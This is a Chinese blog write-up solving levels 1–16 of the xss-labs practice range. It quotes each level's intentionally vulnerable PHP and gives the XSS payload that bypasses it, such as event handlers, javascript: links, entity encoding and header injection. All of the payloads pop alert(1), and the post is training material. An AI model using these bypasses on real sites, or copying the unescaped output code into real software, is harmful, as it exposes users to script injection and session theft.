Xss-labs-master 1-16关

已于 2024-03-06 22:20:14 修改
阅读量855 收藏 15
点赞数 17
文章标签: xss android 前端
于 2024-03-06 17:53:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CvtNhso/article/details/136486372
版权

第一关
 

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

没有任何过滤 直接写

第二关
 

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form> 
</center>';
?>

可以看到有一个过滤函数但是input标签中没有进行过滤只是用了闭合
使用1">将input标签闭合  之后用//将后面的引号闭合使代码与>进行一个拼接

第三关
 

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

分析代码可以看到现在必须绕过htmlspecialchars()这个函数所以我们无法使用标签
但是我们可以在标签中添加一个事件
例如:1' onclink=alert(1)//   上传后点击输入框触发事件即可
事件有很多种可以自己搜索

第四关

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

它使用str_replace()函数将<>换成了空字符
但是我们依然可以绕过双引号后使用事件进行过关1" onclink=alert(1)// 

第五关
 

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

使用strlower()函数全部转换为小写,所以不能大小写绕过
使用replace()函数,将<script 替换成<scr_ipt,将on替换成o_n
所以怎么办呢?
我们可以使用JavaScript伪协议进行绕过
JavaScript伪协议实际上是把javascript:后面的代码当JavaScript来执行,并将结果值返回给当前页面
我们可以使用a标签它的触发点就在href这个属性中当我们写入JavaScript:后它就有了执行JavaScript的能力
我们可以使用a"><a href=javascript:alert(1)>asdf

第六关

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

我们可以发现它将上一关a标签的href属性进行了过滤
但是它并没有过滤大小写
所以我们只需要换成大写即可:a"><SCRIPT>alert(1)</SCRIPT>

第七关

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

可以看到它将所有都转成小写
并且将可能使用到的恶意标签替换成了空字符
我们可以使用双写进行绕过:a"><scrscriptipt>alert(1)</scriscriptpt>

第八关

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

可以看到它将我们之前所用到的绕过方式全部进行了过滤
但是我们可以使用HTML实体编码进行绕过
我们可以看到它最终是放进了href中所以我们直接将javascript:alert(1)转码为html实体编码即可

第九关

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

可以看到不仅过滤了我们以上使用的所有方法并且使用strpos()函数检查了字符串中是否存在
‘http://’
其实这样很简单我们就提交存在‘http://’的payload不就行了
javascript:alert(1)先将这段转成HTML实体编码然后再给后面拼接‘//http://’

第十关

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

我们可以看到它将input标签隐藏了起来并且过滤了<>
虽然无法使用标签闭合但是我们可以直接写入js代码修改input标签的属性
        t_sort=点击"%20type=button%20οnclick="alert(1)

第十一关

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

分析代码可以看到它将上一次的注入点进行了过滤
但是它添加了一个http的请求头我们可以尝试从这里进行切入
进行抓包

我们手动给它添加上Referer之后放行

第十二关

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

查看源码可以看到只是将获取referer改为了获取user_agent
抓包将user_agent中的内容改为aaa" type="button" οnclick="alert(1)

第十三关

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

依然是抓包这次改的是cookie的值

第十四关

百度了以下发现是 由于本关因iframe调用的文件地址失效,无法进行测试。

第十五关

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

我们可以看到它将我们上传的内容进行了转义
但是我看到这个class属性的内容是ng-include:不知道什么意思

通过百度可以得知这是一个页面包含的指令

通过测试可以看到它确实将其他网页包含进来了
我们可以尝试构建被包含进来的网页的payload
src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

第十六关

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>

可以看到它将scrip空格和/替换为&nbsp
但是它并没有过滤on所以我们可以将空格替换为回车在url编码中%0A代表着回车符

%3Cimg%0Asrc=1%0Aοnerrοr=alert(1)%3E

第十七关之后我们可以看到他们都有
src=xsf01.swf,swf文件是以前的旧浏览器的flash文件,但是现在浏览器基本都不支持了
有兴趣的话可以自己尝试实现

夏天的海!
关注
网络安全笔记-99-渗透-XSS
wwxxee
01-05 678
XSS跨站脚本攻击 XSS(Cross-Site Scripting)。是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会收到影响 危害: 盗取用户账号 窃取用户cookie 劫持用户会话 刷流量,执行弹窗广告 传播蠕虫病毒 … 分类 反射型 ​ 非持久型的,参数型跨站脚本。用户访问恶意链接,客户端浏览器执行恶意代码。 ​ 一般容易出现在搜索框,输入框,url参数中 存储型 ​ 持久性的,恶意代码被写进数据库或文件永久保存。
xss跨站攻击【网络攻防CTF】(保姆级图文)
MZH
05-17 1350
xss跨站攻击【网络攻防CTF】(保姆级图文)
1.6 xss挑战平台练习
weixin_30321449的博客
08-08 213
------------------------- XSS挑战之旅 ------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA...
xss-labs-master教程
qq_73792226的博客
09-07 976
abc
XSS-labs-master靶场的搭建
weixin_68416970的博客
06-18 421
XSS-labs-master靶场的搭建
xss-labs1-10
weixin_71398630的博客
04-07 699
第一:html部分标签可以解析js第二:可以看到value用双引号闭合了,使用上一的payload没用,尝试一下闭合这个input所以使用双引号和>闭合后再加入上一的payload第三:通过查看源码发现是使用了单引号闭合再使用上一payload发现它在输入get时使用了.htmlspecialchars(HTML实体编码)这个函数是PHP中的一个编码函数,用于将字符串中的特殊字符转换为对应的HTML实体。它通常用于确保字符串在HTML页面中显示时不会出现意外的效果。
xss-labs-master心得
Ays.Ie的博客
11-03 1892
xss-labs-master心得
xss-labs-master靶场
K_kiii的博客
03-09 433
level1 发现有一个name参数,值为test;对name进行payload注入 name=<script>alert('hack')</script> 说明源码是完全没有对get请求道德name变量进行过滤,所以会被执行。 level2 1.test是以get请求发送的变量,2.在页面上发现了用户发送的变量 查看源码 发现我们输入的内容是一个文本框的value值,这样浏览器是不会执行我们的注入语句的,所以我们要构造标签闭合 构造闭合标签,把inp
XSS-labs-master靶场:1-13速通
weixin_68416970的博客
08-05 484
XSS-labs-master靶场:1-13快速通教程;超详细!!!
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
XSS Labs Master源码详解:深度探索跨站脚本攻击与防御》 XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss跨站及绕过与防护
weixin_67289581的博客
10-27 520
它主要是指攻击者可以在页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份/钓鱼/传播恶意代码等行为。
pikachu-XSS挑战
Valder__的博客
10-24 445
可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆。看到源码是一个script语句,将前面的闭合,再写一个新的弹窗。在留言板输入,发现没有变化,在提示中看到登陆后台。进入源码找到提示,将标签闭合。输入上一个,点击链接即可。同样的语句,链接点两次。随意输入可以看到提示。
一文掌握异步web框架FastAPI(七)-- 安全(XSS 和 CSRF 防护、权限和角色控制、审计日志、使用安全的随机数生成、API 文档保护、会话管理)
qq_38120851的博客
10-24 1065
FastAPI安全,XSS 和 CSRF 防护、权限和角色控制、审计日志、使用安全的随机数生成、API 文档保护、会话管理。
Android状态栏/通知栏图标白底问题
qq_46687516的博客
10-23 812
状态栏会显示一个白底的方框;下拉通知栏展开时的图标为白底方框加圆框,不展开时为黑底方框。
PHP免杀详细讲解PHP免杀详细讲解
zkaqlaoniao的博客
10-28 355
php// 解密后为system,高危函数echo $f;?
Android 判断蓝牙是否开启,监听蓝牙状态,处理客制化需求
qq_46687516的博客
10-25 644
/监听当前蓝牙状态。if (bluetoothEnable) {//判断蓝牙是否开启。其实,对应如此,NFC也可以这样!NfcAdapter。的start()方法里面注册广播。
指令(一):Android OS实用指令
最新发布
XuChaofafa的博客
10-28 150
将上面的pkgName 替换为 具体的app的包名,比如:com.weifu.daozharadar.xtqapp。其中app-release_V1.0.5.apk部分可以替换成具体的apk文件名称。方法一:dumpsys指令。方法二:aapt指令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值